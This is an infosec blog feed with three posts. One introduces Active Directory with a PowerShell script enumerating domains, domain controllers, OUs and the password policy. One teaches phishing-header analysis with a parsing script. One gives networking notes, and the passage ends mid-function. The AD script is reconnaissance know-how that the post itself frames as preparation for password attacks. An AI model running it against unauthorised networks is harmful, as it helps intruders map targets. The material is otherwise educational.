<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://blog.anotsodev.me/feed.xml" rel="self" type="application/atom+xml" /><link href="https://blog.anotsodev.me/" rel="alternate" type="text/html" /><updated>2026-06-17T02:23:16+00:00</updated><id>https://blog.anotsodev.me/feed.xml</id><title type="html">anotsodev</title><subtitle>Posting InfoSec related contents and writeups.</subtitle><entry><title type="html">Attacking and Defending Active Directory Part I</title><link href="https://blog.anotsodev.me/2020/04/19/attacking-and-defending-active-directory-part-i.html" rel="alternate" type="text/html" title="Attacking and Defending Active Directory Part I" /><published>2020-04-19T00:00:00+00:00</published><updated>2020-04-19T00:00:00+00:00</updated><id>https://blog.anotsodev.me/2020/04/19/attacking-and-defending-active-directory-part-i</id><content type="html" xml:base="https://blog.anotsodev.me/2020/04/19/attacking-and-defending-active-directory-part-i.html"><![CDATA[<h2 id="introduction">Introduction</h2>

<p><a href="https://en.wikipedia.org/wiki/Active_Directory">Microsoft Active Directory</a> is one of the most interesting services to attack: a misconfigured domain lets an attacker enumerate a treasure trove of information such as domain users, administrative shares and password policies.</p>

<p>In this series, I will be separating this into three parts. The first part will include the introduction of Active Directory and its components.</p>

<p>The second part will cover different types of attacks against Active Directory and demonstrate how to execute them.</p>

<p>And lastly, we’ll be covering different approaches in defending and reducing attack surfaces of Active Directory.</p>

<h2 id="what-is-active-directory">What is Active Directory?</h2>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/04/active-directory-logo.png?resize=600%2C283&amp;ssl=1" alt="" /></p>

<p>Active Directory (AD) is Microsoft’s centralized directory service for Windows networks. It stores information about objects on the network (users, computers, groups, policies) and automates the management of user data, security and distributed resources.</p>

<h2 id="active-directory-components">Active Directory Components</h2>

<p><img src="https://i2.wp.com/anotsodev.me/wp-content/uploads/2020/04/Components.png?fit=1024%2C683&amp;ssl=1" alt="" /></p>

<p>To give you an overview, Active Directory consists of the following components:</p>

<ul>
  <li><strong>Domains</strong></li>
  <li><strong>Forests</strong></li>
  <li><strong>Sites</strong></li>
  <li><strong>Domain Controllers</strong></li>
  <li><strong>Organizational Units (OU)</strong></li>
</ul>

<p>Each of these components has its own purpose that enables Active Directory to function within an organization.</p>

<p>I will just summarize the meanings and functions of these components but you can read more about Active Directory on the <a href="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview">official documentation</a> of Microsoft.</p>

<h3 id="domains">Domains</h3>

<p>Active Directory domains are where the users and computers are located. Each domain holds its own database of objects (users, computers, groups) together with the identity information for each of them, such as credentials and group memberships.</p>

<p>For example, I have an AD domain called internal.anotsodev.org. This domain contains all the information of users and computers joined in this domain.</p>

<h3 id="forests">Forests</h3>

<p>Active Directory forests are the topmost logical containers of the hierarchy. All domains in a forest share one schema and configuration and are linked by automatic two-way transitive trusts, which is why Microsoft treats the forest, not the domain, as the security boundary. The illustration below shows the organizational domain forest model of <strong>internal.anotsodev.org</strong>.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/04/AD-Forest.png?resize=633%2C412&amp;ssl=1" alt="" /></p>

<h3 id="sites">Sites</h3>

<p>Active Directory sites let clients locate and authenticate to a domain controller that is close to them on the network, and let replication between domain controllers be scheduled and compressed over slow links.</p>

<p>A site is defined by one or more IP subnets and usually maps to a physical location of the organization, such as an office or a data center.</p>

<h3 id="domain-controllers">Domain Controllers</h3>

<p>Active Directory domain controllers hold a writable copy of the domain database, handle authentication requests (Kerberos and NTLM) and decide whether a user may access a domain resource. User settings and restrictions are applied through Group Policy, which the domain controllers serve to domain members. Because a domain controller stores the credential material of every account in the domain, compromising one means compromising the whole domain.</p>

<h3 id="organizational-unit-ou">Organizational Unit (OU)</h3>

<p>An organizational unit (OU) is a subdivision within an Active Directory domain into which you can place users, groups, computers, and other organizational units. You can create organizational units to mirror your organization’s functional or business structure. Each domain can implement its own organizational unit hierarchy. If your organization contains several domains, you can create organizational unit structures in each domain that are independent of the structures in the other domains. OUs are also the level at which Group Policy is linked and administrative control is delegated, so the OU design decides who can manage which users and computers.</p>
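<p>To make the components above concrete, here is an added example (not code from the original post) that enumerates them from a domain-joined Windows host using the .NET <code>System.DirectoryServices</code> classes, so it needs neither RSAT nor the ActiveDirectory module. It assumes you are logged in with a domain account and can reach a domain controller over LDAP; the output labels are mine.</p>

```powershell
# Added example, not part of the original post: walk the AD components described above
# (forest, domains, sites, domain controllers, OUs) plus the domain password policy, using
# only .NET classes available on any domain-joined Windows host. Assumes a domain account
# and LDAP (TCP 389) access to a domain controller.

$forest = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
$domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# Forest: the top of the hierarchy and the security boundary
'Forest:  {0}  (root domain: {1}, functional level: {2})' -f $forest.Name, $forest.RootDomain.Name, $forest.ForestMode

# Domains: every domain in the forest and where it hangs in the tree
'Domains:'
foreach ($d in $forest.Domains) {
    $parent = if ($d.Parent) { $d.Parent.Name } else { '(root)' }
    '  {0}  parent={1}' -f $d.Name, $parent
}

# Sites and their subnets: this is how a client is steered to a nearby domain controller
'Sites:'
foreach ($s in $forest.Sites) {
    $subnets = ($s.Subnets | ForEach-Object { $_.Name }) -join ', '
    '  {0}  subnets=[{1}]' -f $s.Name, $subnets
}

# Domain controllers of the current domain, plus the one holding the PDC emulator role
'Domain controllers for {0}:' -f $domain.Name
foreach ($dc in $domain.DomainControllers) {
    '  {0}  site={1}  ip={2}' -f $dc.Name, $dc.SiteName, $dc.IPAddress
}
'PDC emulator: {0}' -f $domain.PdcRoleOwner.Name

# Organizational units: an LDAP subtree search from the domain root. The distinguished name
# shows where each OU sits; this is the level where GPOs are linked and admin is delegated.
$root = $domain.GetDirectoryEntry()
$ouSearch = New-Object System.DirectoryServices.DirectorySearcher($root, '(objectCategory=organizationalUnit)', @('distinguishedName'))
$ouSearch.PageSize = 1000   # page the results so large domains do not hit the 1000-object limit
'Organizational units:'
foreach ($r in $ouSearch.FindAll()) {
    '  {0}' -f $r.Properties['distinguishedname'][0]
}

# Domain password policy: stored as attributes on the domain object itself. maxPwdAge is a
# negative 100-nanosecond interval; Int64.MinValue means passwords never expire.
$polSearch = New-Object System.DirectoryServices.DirectorySearcher($root, '(objectClass=domainDNS)', @('minPwdLength', 'pwdHistoryLength', 'lockoutThreshold', 'maxPwdAge'))
$polSearch.SearchScope = 'Base'
$pol = $polSearch.FindOne().Properties
$maxAgeRaw = [int64]$pol['maxpwdage'][0]
$maxAge = if ($maxAgeRaw -eq [int64]::MinValue) { 'never' } else { '{0} days' -f [TimeSpan]::FromTicks(-$maxAgeRaw).TotalDays }
'Password policy: minLength={0} history={1} lockoutThreshold={2} maxAge={3}' -f $pol['minpwdlength'][0], $pol['pwdhistorylength'][0], $pol['lockoutthreshold'][0], $maxAge
```

<p>Everything the script reads is readable by any authenticated domain user by default, which is exactly why the introduction calls AD a treasure trove: no special privilege is needed to map the forest, find the domain controllers or read the lockout threshold before trying passwords.</p>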


<p>So that ends the first part of the “Attacking and Defending Active Directory” series.</p>

<p>I will be posting the second part of this series, covering the actual attacks used against Active Directory, next week.</p>

<p>Stay tuned and be safe!</p>

<p><strong>References:</strong></p>

<ul>
  <li><a href="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview">https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview</a></li>
  <li><a href="https://www.varonis.com/blog/active-directory-forest/">https://www.varonis.com/blog/active-directory-forest/</a></li>
  <li><a href="https://kb.iu.edu/d/atvu">https://kb.iu.edu/d/atvu</a></li>
</ul>]]></content><author><name>[&quot;anotsodev&quot;]</name></author><summary type="html"><![CDATA[Introduction Microsoft Active Directory is one of the most interesting services to attack since we can gather a lot of information just by checking if the server is misconfigured which enables…]]></summary></entry><entry><title type="html">How to identify phishing emails</title><link href="https://blog.anotsodev.me/2020/04/11/how-to-identify-phishing-emails.html" rel="alternate" type="text/html" title="How to identify phishing emails" /><published>2020-04-11T00:00:00+00:00</published><updated>2020-04-11T00:00:00+00:00</updated><id>https://blog.anotsodev.me/2020/04/11/how-to-identify-phishing-emails</id><content type="html" xml:base="https://blog.anotsodev.me/2020/04/11/how-to-identify-phishing-emails.html"><![CDATA[<p>This blog post will help you identify phishing emails and learn which tools are used to check whether the sender and the links are legitimate.</p>

<p>The scenario below gives an example of a phishing attack and its consequences.</p>

<p>So let’s say you have received an email that looks like it came from a service you use frequently. For example, one from PayPal saying that someone logged in to your account, or one from coins.ph (a digital wallet used in the Philippines) saying that you have an unclaimed reward because you and your friends are verified.</p>

<p>Since the email has your attention and you are convinced there is a reward waiting to be claimed, you ignore the red flags, such as the sender’s email address and the inconsistencies in the email format. You click the button, which takes you to a familiar-looking site under an unfamiliar URL. You enter your credentials and click the login button, but instead of prompting you for the authentication code from your 2FA device, it redirects you to the real site of the service.</p>

<p>Now you are wondering, what happened? Let me tell you…</p>

<p><strong>You just got phished!</strong></p>

<p>The fake site where you entered your credentials has already gotten your login information. Your email address, your username, and password. Everything.</p>

<p>So if you are using similar credentials to other services, you are basically <em>f’d</em> <em>up</em>.</p>

<p>To help you stay vigilant, take your time to read this post and familiarize yourself with the characteristics of an email that indicate it could be a phishing attempt.</p>

<p>This post will cover the basic approach to identify phishing emails.</p>

<p>Just to give you the overview, here’s the outline of this post.</p>

<ul>
  <li>Identify phishing emails by Internet Headers analysis and Email Reputation Lookup</li>
  <li>Containment Approaches</li>
  <li>Summary</li>
</ul>

<h2 id="identify-phishing-emails-by-internet-headers-analysis-and-email-reputation-lookup">Identify phishing emails by Internet Headers analysis and Email Reputation Lookup</h2>

<p>In this section, you will learn how to analyze headers and identify the source IP of the sender or the relay server that they have used to send the phishing email.</p>

<p>We’ll be using this tool called <a href="https://mxtoolbox.com/EmailHeaders.aspx">MxToolbox</a>. You may read the brief description from their site to learn more.</p>

<blockquote>
  <p>ABOUT EMAIL HEADERS</p>

  <p>This tool will make email headers human readable by parsing them according to RFC 822. Email headers are present on every email you receive via the Internet and can provide valuable diagnostic information like hop delays, anti-spam results and more.</p>
</blockquote>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/04/image.png?fit=1024%2C372&amp;ssl=1" alt="" /></p>

<p>MxToolbox Email Header Analyzer</p>

<p>So before we use this tool, let’s get first the internet headers from the suspected phishing email. I will be using the internet headers of the email that was sent to my Protonmail address.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/04/image-1.png?resize=1008%2C808&amp;ssl=1" alt="" /></p>

<p>Coins.ph phishing email sent to Protonmail</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/04/image-2.png?fit=1024%2C517&amp;ssl=1" alt="" /></p>

<p>Example email sent to Gmail</p>

<p>You may view the internet headers of your email on Protonmail by clicking the dropdown button then <strong>View Headers</strong>. On Gmail, click the ‘kebab’ (<em>three vertical dots</em>) button then <strong>Show original</strong>.</p>

<p>After clicking the <strong>View Headers</strong> or <strong>Show Original</strong> button, just copy all the content then paste it to the email header analyzer tool then click the Analyze Header button.</p>

<p>After you submit the internet headers for analysis, you’ll see this page which contains the summary of the analysis.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/04/image-3.png?fit=1024%2C504&amp;ssl=1" alt="" /></p>

<p>Header Analysis Summary</p>

<p>On this email, you may notice that the sender used Gmail to send the phishing email.</p>

<p>Because the message left through Google’s outbound servers, the sending IP has a good reputation and an IP lookup tells you nothing about the attacker; for a phish like this one, the sender address, display name and links are the evidence. To demonstrate identifying a dangerous source IP, let’s use the internet headers of a different phishing email.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/04/image-4.png?resize=1170%2C267&amp;ssl=1" alt="" /></p>

<p>Email sent from blacklisted/spammer IP</p>

<p>Here the sender’s IP is <strong>185.234.219.119</strong>. We can look up the reputation of that address with open-source intelligence services such as <strong><a href="https://talosintelligence.com/">Talos Intelligence</a></strong> by Cisco.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/04/image-5.png?resize=1170%2C768&amp;ssl=1" alt="" /></p>

<p>IP Reputation Lookup result</p>

<p>By using this tool, you can see details such as the location, reputation, owner, content, and blacklists that may help you to assess how dangerous the sender is.</p>

<p>Now, let’s move back to the MxToolbox analysis result to get more details about the email.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/04/image-7.png?resize=1170%2C532&amp;ssl=1" alt="" /></p>

<p>Headers Found</p>

<p>You may notice that the display name of the sender does not match the sender’s email address. That alone is a strong hint that the email is not legitimate.</p>

<p>Header names starting with “X-” are custom, non-standard headers added by relay servers or mail gateways, such as spam-filter scores and verdicts. One caveat when reading the <em>Received</em> headers: each relay prepends its own, so only the ones added by your own mail provider can be trusted; any headers below those were supplied by the sending side and can be forged.</p>
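<p>The following is an added example, not code from the original post, that does by hand the core of what the MxToolbox analyzer shows: it unfolds the headers, walks the <em>Received</em> chain to find the IP you would submit to Talos, and flags a display name that does not match the sender’s domain, a Reply-To on another domain, and failed SPF/DKIM/DMARC results. The headers it parses are constructed for illustration: the hostnames use the example.* documentation domains and the addresses come from the 198.51.100.0/24 and 203.0.113.0/24 documentation ranges, so nothing here points at a real sender.</p>

```powershell
# Added example, not code from the original post: a hand-rolled header triage that does the core
# of what the MxToolbox analyzer shows (delivery path, sender IP, display-name/address mismatch,
# authentication results). The headers are constructed for illustration: hostnames use the
# example.* documentation domains and the IPs come from the 198.51.100.0/24 and 203.0.113.0/24
# documentation ranges, so nothing here points at a real sender.

$rawHeaders = @'
Received: from mail.example.net (mail.example.net [198.51.100.7])
    by mx.protonmail.ch (Postfix) with ESMTPS id 4F9C1A0B
    for <victim@protonmail.com>; Sat, 11 Apr 2020 09:12:44 +0000 (UTC)
Received: from webmail-host ([203.0.113.45])
    by mail.example.net (Postfix) with ESMTPA id 1B2C3D
    for <victim@protonmail.com>; Sat, 11 Apr 2020 09:12:41 +0000 (UTC)
From: "Coins.ph Support" <promo-team@example.net>
Reply-To: claim-reward@example.org
To: victim@protonmail.com
Subject: You have an unclaimed reward!
Authentication-Results: mx.protonmail.ch; spf=softfail smtp.mailfrom=example.net;
    dkim=none; dmarc=fail header.from=example.net
X-Spam-Score: 7.3
'@

function ConvertFrom-MailHeader {
    param([Parameter(Mandatory)][string]$Raw)
    # Unfold first: a line starting with whitespace continues the previous field (RFC 5322, 2.2.3)
    $unfolded = $Raw -replace "`r?`n[ \t]+", ' '
    foreach ($line in ($unfolded -split "`r?`n")) {
        # field name = printable ASCII except ':'; everything after the colon is the value
        if ($line -match '^([!-9;-~]+):\s*(.*)$') {
            [pscustomobject]@{ Name = $matches[1]; Value = $matches[2] }
        }
    }
}

function Get-ReceivedChain {
    param([Parameter(Mandatory)][object[]]$Headers)
    # Every relay prepends its own Received: field, so reading them bottom-up walks the path from
    # the sender to you. Only the fields added by servers you trust (your own provider) are
    # reliable; anything beneath those was supplied by the sending side and can be forged.
    $hops = @($Headers | Where-Object { $_.Name -eq 'Received' } | ForEach-Object {
        $ip = if ($_.Value -match '\[(\d{1,3}(?:\.\d{1,3}){3})\]') { $matches[1] } else { $null }
        $by = if ($_.Value -match '\bby\s+(\S+)') { $matches[1] } else { $null }
        [pscustomobject]@{ IP = $ip; By = $by }
    })
    [array]::Reverse($hops)
    $hops
}

function Test-SenderConsistency {
    param([Parameter(Mandatory)][object[]]$Headers)
    $get = { param($n) ($Headers | Where-Object { $_.Name -eq $n } | Select-Object -First 1).Value }
    $from     = & $get 'From'
    $replyTo  = & $get 'Reply-To'
    $auth     = & $get 'Authentication-Results'
    $findings = @()

    # From: "Display Name" <address>; compare the brand in the display name with the address domain.
    # This is a heuristic: it catches the common "Brand Support <random@other-domain>" pattern.
    $display = ''; $fromDomain = ''
    if ($from -match '^\s*"?([^"<]*?)"?\s*<([^>]+)>\s*$') {
        $display    = $matches[1].Trim()
        $fromDomain = ($matches[2] -split '@')[-1].ToLower()
    } elseif ($from) {
        $fromDomain = ($from.Trim() -split '@')[-1].ToLower()
    }
    $brand = ($display -split '[\s.]')[0]
    if ($brand -and $fromDomain -notlike "*$brand*") {
        $findings += "display name '$display' does not match sender domain '$fromDomain'"
    }

    # A Reply-To on another domain sends your reply (and whatever you type) somewhere else
    if ($replyTo) {
        $replyDomain = (($replyTo -replace '^.*<|>.*$', '') -split '@')[-1].ToLower()
        if ($replyDomain -ne $fromDomain) {
            $findings += "Reply-To domain '$replyDomain' differs from From domain '$fromDomain'"
        }
    }

    # Authentication-Results is written by your own provider, so a non-pass here is meaningful
    foreach ($mech in 'spf', 'dkim', 'dmarc') {
        if ($auth -match "\b$mech=(\w+)" -and $matches[1] -ne 'pass') {
            $findings += "$mech=$($matches[1])"
        }
    }
    $findings
}

$headers = @(ConvertFrom-MailHeader -Raw $rawHeaders)
'Delivery path, sender first (the first IP is the one to look up in Talos):'
Get-ReceivedChain -Headers $headers | ForEach-Object { '  {0,-16} received by {1}' -f $_.IP, $_.By }
'Findings:'
Test-SenderConsistency -Headers $headers | ForEach-Object { "  - $_" }
```

<p>With the constructed headers, the first hop is 203.0.113.45 handing the message to mail.example.net, and the last hop is mx.protonmail.ch, the provider’s own server. The bottom <em>Received</em> line is the one to feed into Talos, but remember that only the lines above the provider’s own entry are guaranteed genuine. For the Gmail-sent phish discussed earlier, this first hop would be a Google address with a clean reputation, which is why the display-name, Reply-To and authentication checks matter as much as the IP lookup.</p>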

<p>Let’s now move on to the next section, which is the containment approaches if you unknowingly entered your credentials to the phishing site.</p>

<h2 id="containment-approaches">Containment Approaches</h2>

<p>Let’s say you entered your credentials into the phishing site and it redirected you to the official site, and you kept wondering why it never prompted you for a 2FA code. You check the email again, see that the sender’s details are inconsistent, and realize that you typed your credentials into a phishing site: you were on your phone when you tapped the link and never noticed the URL.</p>

<p>So what should you do about this incident?</p>

<p>These are the steps that you <strong>MUST</strong> take to contain the incident and stop the attacker from abusing your credentials:</p>

<ol>
  <li>Change your password immediately. Use a password manager (1Password, Enpass or Bitwarden) to generate a long, random one that you will not reuse anywhere else.</li>
  <li>Log out all sessions of your account, and check that 2FA and your recovery settings (phone number, backup email, mail forwarding rules) are still what you set them to, since anyone who logged in could have changed them.</li>
  <li>If you use the same login details on other services, change those passwords immediately as well.</li>
  <li>Install an antivirus scanner and run a full scan, in case a malicious executable was downloaded onto your device.</li>
  <li>Delete the email from your inbox (report it as phishing first if your mail provider offers that).</li>
</ol>

<p>After these steps, the stolen credential no longer gives the attacker access to your account. Keep an eye on the account’s login activity for a while afterwards anyway.</p>

<h2 id="summary">Summary</h2>

<p>Just to summarize the topics that I’ve discussed here, we tackled how to spot phishing emails by checking the internet headers and using tools such as <strong>MxToolbox</strong> and <strong>Talos Intelligence</strong> to aid us with our analysis. Lastly, we tackled the necessary steps in securing your account again after being a victim of phishing.</p>

<p>So that’s it! I hope you have learned new technologies and tools by reading this blog post. I will be posting more guides and tutorials again soon whenever I have time.</p>

<p>May the force be with you.</p>

<p><a href="https://www.freepik.com/free-photos-vectors/abstract">Featured Image created by katemangostar – www.freepik.com</a></p>]]></content><author><name>[&quot;anotsodev&quot;]</name></author><summary type="html"><![CDATA[This blog post will help you identify phishing emails and learn what are the tools being used in checking if the sender and links are legitimate. The scenario in the next section will tell you the …]]></summary></entry><entry><title type="html">Networking Concepts and Protocols</title><link href="https://blog.anotsodev.me/2020/03/28/networking-concepts-and-protocols.html" rel="alternate" type="text/html" title="Networking Concepts and Protocols" /><published>2020-03-28T00:00:00+00:00</published><updated>2020-03-28T00:00:00+00:00</updated><id>https://blog.anotsodev.me/2020/03/28/networking-concepts-and-protocols</id><content type="html" xml:base="https://blog.anotsodev.me/2020/03/28/networking-concepts-and-protocols.html"><![CDATA[<p>This blog post is an outline of the Networking Concepts and Protocols course on Pluralsight. Feel free to skim it to get a high-level overview of the topics the course covers.</p>

<h2 id="introduction">Introduction</h2>

<ul>
  <li>What is networking?</li>
  <li>Concepts</li>
  <li>Modeling network communication</li>
</ul>

<h2 id="data-networking">Data Networking</h2>

<ul>
  <li>Data moving from a device to another device</li>
</ul>

<h2 id="understanding-data-networking">Understanding Data Networking</h2>

<ul>
  <li>Protocols talk to their peer protocols: each layer communicates with the same layer on the other device</li>
</ul>

<h3 id="modeling-systems">Modeling Systems</h3>

<ul>
  <li>Concept
    <ul>
      <li>Language</li>
      <li>Link</li>
      <li>Physical</li>
    </ul>
  </li>
</ul>

<h3 id="the-osi-model">The OSI Model</h3>

<ul>
  <li>Open Systems Interconnection</li>
</ul>

<h4 id="physical-layer-layer-1">Physical Layer (Layer 1)</h4>

<ul>
  <li>Physical Devices</li>
  <li>Cables
    <ul>
      <li>Twisted Pair</li>
      <li>Coaxial</li>
      <li>Fiber Optics</li>
      <li>Copper</li>
    </ul>
  </li>
</ul>

<h4 id="data-link-layer-layer-2">Data Link Layer (Layer 2)</h4>

<ul>
  <li>Ethernet</li>
  <li>DOCSIS 3 (cable modem to ISP)</li>
  <li>Move data from one device to another device</li>
</ul>

<h4 id="network-layer-layer-3">Network Layer (Layer 3)</h4>

<ul>
  <li>IP Addressing</li>
  <li>IP Routing</li>
</ul>

<h4 id="transport-layer-layer-4">Transport Layer (Layer 4)</h4>

<ul>
  <li>Session between client and server</li>
  <li>TCP – Transmission Control Protocol</li>
  <li>UDP – User Datagram Protocol</li>
</ul>

<h4 id="session-layer-layer-5">Session Layer (Layer 5)</h4>

<h4 id="presentation-layer-layer-6">Presentation Layer (Layer 6)</h4>

<ul>
  <li>Decoding ASCII</li>
  <li>EBCDIC (IBM Encoding)</li>
</ul>

<h4 id="application-layer-layer-7">Application Layer (Layer 7)</h4>

<ul>
  <li>HTTP</li>
  <li>HTTPS</li>
</ul>

<h2 id="protocols-and-port-numbers">Protocols and Port Numbers</h2>

<h4 id="application-layer-protocols-layer-7">Application Layer Protocols (Layer 7)</h4>

<ul>
  <li>Transferring Data</li>
  <li>Hypertext Transfer Protocols
    <ul>
      <li>HTTP (Layer 4 port: 80)</li>
      <li>HTTPS (Layer 4 port: 443)</li>
    </ul>
  </li>
  <li>File Transfer Protocols
    <ul>
      <li>FTP (Port 21 control, Port 20 data)</li>
      <li>SFTP (Port 22)
        <ul>
          <li>SSH File Transfer Protocol, runs inside an SSH session (not FTP over SSH)</li>
        </ul>
      </li>
      <li>TrivialFTP (Port 69)
        <ul>
          <li>Used to transfer files without authentication</li>
        </ul>
      </li>
      <li>SMB (Port 445)</li>
    </ul>
  </li>
  <li>Email Protocols
    <ul>
      <li>SMTP (Port 25/465/587)
        <ul>
          <li>Used for outbound emails</li>
        </ul>
      </li>
      <li>POP3 (Port 110/995) /IMAP (Port 143/993)
        <ul>
          <li>Used for inbound emails</li>
        </ul>
      </li>
    </ul>
  </li>
  <li>Authentication Protocols
    <ul>
      <li>LDAP (Port 389)</li>
      <li>LDAPS (Port 636)</li>
    </ul>
  </li>
  <li>Network Services
    <ul>
      <li>DHCP</li>
      <li>DNS</li>
      <li>NTP</li>
    </ul>
  </li>
  <li>Network Management
    <ul>
      <li>Telnet</li>
      <li>SSH</li>
      <li>SNMP</li>
      <li>RDP</li>
    </ul>
  </li>
  <li>Audio/Video Protocols
    <ul>
      <li>H.323 (Port 1720)</li>
      <li>SIP (Port 5060, 5061 over TLS)</li>
    </ul>
  </li>
</ul>

<h4 id="transport-layer-protocols-layer-4">Transport Layer Protocols (Layer 4)</h4>

<ul>
  <li>TCP
    <ul>
      <li>Transmission Control Protocol</li>
      <li>Uses 3-way handshake to establish session with other devices
        <ul>
          <li>SYN – SYN/ACK – ACK</li>
        </ul>
      </li>
      <li>Uses 4-way disconnect to end established session with other devices
        <ul>
          <li>FIN – ACK – FIN – ACK</li>
          <li>RST
            <ul>
              <li>Immediately end established session</li>
            </ul>
          </li>
        </ul>
      </li>
    </ul>
  </li>
  <li>UDP
    <ul>
      <li>User Datagram Protocol</li>
      <li>Sends datagrams with no sequencing or acknowledgement</li>
      <li>Does not establish session</li>
    </ul>
  </li>
</ul>

<h4 id="transport-layer-addressing">Transport Layer Addressing</h4>

<ul>
  <li>Port Numbers
    <ul>
      <li>Well Known – 0 – 1023</li>
      <li>Registered – 1024 – 49151</li>
    </ul>
  </li>
  <li>Client Port Numbers (Temporary / ephemeral)
    <ul>
      <li>49152 – 65535</li>
    </ul>
  </li>
</ul>

<h2 id="binary-and-hexadecimal">Binary and Hexadecimal</h2>

<ul>
  <li>Base 2 (0 – 1)</li>
  <li>Base 10 (0 – 9)</li>
  <li>Base 16 (0 – 15) (0 – F)</li>
</ul>

<h2 id="introduction-to-ip-addressing">Introduction to IP Addressing</h2>

<ul>
  <li>Classful</li>
  <li>Classless</li>
  <li>What is an IP address?
    <ul>
      <li>192.168.1.1/24: [ 192.168.1 ] – Network Portion, [ .1 ] – Host Portion</li>
    </ul>
  </li>
  <li>Classless Addressing
    <ul>
      <li>Subnet Mask
        <ul>
          <li>Ones mark the network portion, zeros the host portion</li>
        </ul>
      </li>
    </ul>
  </li>
  <li>Classful Addressing
    <ul>
      <li>Unicast
        <ul>
          <li>Class A</li>
          <li>Class B</li>
          <li>Class C</li>
        </ul>
      </li>
      <li>Multicast
        <ul>
          <li>Class D</li>
        </ul>
      </li>
    </ul>
  </li>
  <li>Address Types
    <ul>
      <li>IP Address Types
        <ul>
          <li>Network Address
            <ul>
              <li>Identifier for a group of devices</li>
            </ul>
          </li>
          <li>Broadcast Address
            <ul>
              <li>Identifier for all devices on a network</li>
            </ul>
          </li>
          <li>Host Address
            <ul>
              <li>Identifies unique device on a network</li>
            </ul>
          </li>
        </ul>
      </li>
      <li>Network Address</li>
      <li>CIDR Notation
        <ul>
          <li>Example: 10.1.1.0/24</li>
        </ul>
      </li>
    </ul>
  </li>
  <li>Subnetting Networks
    <ul>
      <li>Variable Length Subnet Masking</li>
    </ul>
  </li>
  <li>Introduction to IPV6
    <ul>
      <li>128 bits long</li>
      <li>32 nibbles</li>
      <li>8 hextets</li>
      <li>Network Portion = 64 bits</li>
      <li>Interface Identifier = 64 bits</li>
      <li>One run of consecutive zero hextets can be compressed to ::</li>
      <li>2^64 interface identifiers per /64 network</li>
      <li>Additional Details
        <ul>
          <li>Dual Stack</li>
          <li>Unicast Address</li>
          <li>fe80::/10 = Link Local Address</li>
        </ul>
      </li>
      <li>IPV6 Address Acquisition
        <ul>
          <li>SLAAC
            <ul>
              <li>Windows
                <ul>
                  <li>Random 64 bit Interface Identifier</li>
                </ul>
              </li>
              <li>Unix
                <ul>
                  <li>Modified EUI-64
                    <ul>
                      <li>Get MAC Address</li>
                      <li>Break into half</li>
                      <li>add ff:fe in the middle</li>
                      <li>flip the 7th bit of the first byte (the universal/local bit)</li>
                    </ul>
                  </li>
                </ul>
              </li>
            </ul>
          </li>
          <li>Router Advertisement (the client learns the prefix from the router’s RA)</li>
        </ul>
      </li>
      <li>IPV6 Tunneling
        <ul>
          <li>The local router tunnels IPv6 traffic over IPv4 to an IPv6 router so that IPv6 resources can be reached.</li>
        </ul>
      </li>
    </ul>
  </li>
</ul>
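<p>As an added example (not part of the original course notes), the two address computations from the outline above written out in full: one function turns a CIDR prefix such as 10.1.1.0/24 into its subnet mask, network and broadcast addresses and usable host count, and the other performs the Modified EUI-64 steps (split the MAC, insert ff:fe, flip the 7th bit) and builds the fe80:: link-local address. The function names and the sample inputs at the bottom are mine.</p>

```powershell
# Added example, not part of the original notes: the two address computations from the outline
# above. Get-IPv4Network turns a CIDR prefix into its subnet mask, network and broadcast
# addresses and usable host count; ConvertTo-Eui64LinkLocal performs the Modified EUI-64 steps
# (split the MAC, insert ff:fe, flip the 7th bit) and builds the fe80:: link-local address.
# The sample inputs at the bottom are made up.

function ConvertTo-DottedQuad {
    param([long]$Value)
    # most significant octet first
    (3..0 | ForEach-Object { ($Value -shr ($_ * 8)) -band 255 }) -join '.'
}

function Get-IPv4Network {
    param([Parameter(Mandatory)][string]$Cidr)   # e.g. 10.1.1.0/24
    if ($Cidr -notmatch '^(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,2})$') { throw "Expected a.b.c.d/n, got: $Cidr" }
    $prefix = [int]$matches[2]
    if ($prefix -gt 32) { throw "Prefix length must be 0-32: $Cidr" }
    $bytes = [System.Net.IPAddress]::Parse($matches[1]).GetAddressBytes()

    # Treat the address as one 32-bit number so the mask can be applied with bitwise operators.
    # 64-bit arithmetic avoids sign trouble with values above 0x7FFFFFFF.
    $ALL32 = [long]4294967295
    $ip = [long]0
    foreach ($b in $bytes) { $ip = ($ip -shl 8) -bor [long]$b }

    # Subnet mask: $prefix one-bits (network portion) followed by zero-bits (host portion)
    $mask      = if ($prefix -eq 0) { [long]0 } else { ($ALL32 -shl (32 - $prefix)) -band $ALL32 }
    $network   = $ip -band $mask                             # host bits cleared
    $broadcast = $network -bor ((-bnot $mask) -band $ALL32)  # host bits set
    $total     = [long]1 -shl (32 - $prefix)
    # /31 (point-to-point) and /32 (host route) do not reserve network and broadcast addresses
    $hosts     = if ($prefix -ge 31) { $total } else { $total - 2 }

    [pscustomobject]@{
        Cidr      = $Cidr
        Mask      = ConvertTo-DottedQuad $mask
        Network   = ConvertTo-DottedQuad $network
        Broadcast = ConvertTo-DottedQuad $broadcast
        Hosts     = $hosts
    }
}

function ConvertTo-Eui64LinkLocal {
    param([Parameter(Mandatory)][string]$Mac)   # e.g. 00:1A:2B:3C:4D:5E or 00-1A-2B-3C-4D-5E
    $octets = @(($Mac -split '[:\-]') | ForEach-Object { [Convert]::ToByte($_, 16) })
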